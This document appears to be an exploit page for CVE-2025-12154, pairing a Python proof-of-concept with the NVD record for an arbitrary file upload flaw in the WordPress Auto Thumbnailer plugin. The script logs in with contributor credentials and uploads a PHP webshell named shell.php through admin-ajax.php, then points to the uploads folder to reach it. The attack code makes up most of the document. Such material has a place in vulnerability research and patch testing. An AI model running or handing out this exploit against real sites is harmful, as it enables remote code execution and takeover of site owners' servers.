CVE-2025-12154

import requests import sys # CVE-2025-12154 PoC - Auto Thumbnailer Arbitrary File Upload # Target: WordPress site with Auto Thumbnailer plugin <= 1.0 def exploit_upload(target_url, username, password, webshell_path): """ Exploit arbitrary file upload vulnerability in Auto Thumbnailer plugin Args: target_url: Base URL of the WordPress site username: WordPress username with Contributor role or higher password: WordPress password webshell_path: Path to the webshell file to upload """ session = requests.Session() # Step 1: Login to WordPress login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/", 'testcookie': '1' } response = session.post(login_url, data=login_data, cookies=session.cookies) if 'wordpress_logged_in' not in session.cookies: print("[-] Login failed!") return False print("[+] Login successful!") # Step 2: Upload malicious file via Auto Thumbnailer uploadThumb() function upload_url = f"{target_url}/wp-admin/admin-ajax.php" with open(webshell_path, 'rb') as f: webshell_content = f.read() files = { 'file': ('shell.php', webshell_content, 'application/x-php') } data = { 'action': 'upload_thumb', 'nonce': 'exploit_nonce' } response = session.post(upload_url, files=files, data=data) if response.status_code == 200: print("[+] File upload request sent!") print(f"[*] Check {target_url}/wp-content/uploads/ for uploaded shell") return True return False if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <webshell_path>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] shell = sys.argv[4] exploit_upload(target, user, pwd, shell)

{"cve": {"id": "CVE-2025-12154", "sourceIdentifier": "[email protected]", "published": "2025-12-05T06:16:05.877", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Auto Thumbnailer plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the uploadThumb() function in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}, {"lang": "es", "value": "El plugin Auto Thumbnailer para WordPress es vulnerable a cargas de archivos arbitrarios debido a la falta de validación del tipo de archivo en la función uploadThumb() en todas las versiones hasta la 1.0, inclusive. Esto hace posible que atacantes autenticados, con acceso de nivel Colaborador y superior, carguen archivos arbitrarios en el servidor del sitio afectado, lo que puede hacer posible la ejecución remota de código."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://wordpress.org/plugins/auto-thumbnailer/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d7c98191-bf17-4e94-88cc-ad385b1fe97d?source=cve", "source": "[email protected]"}]}}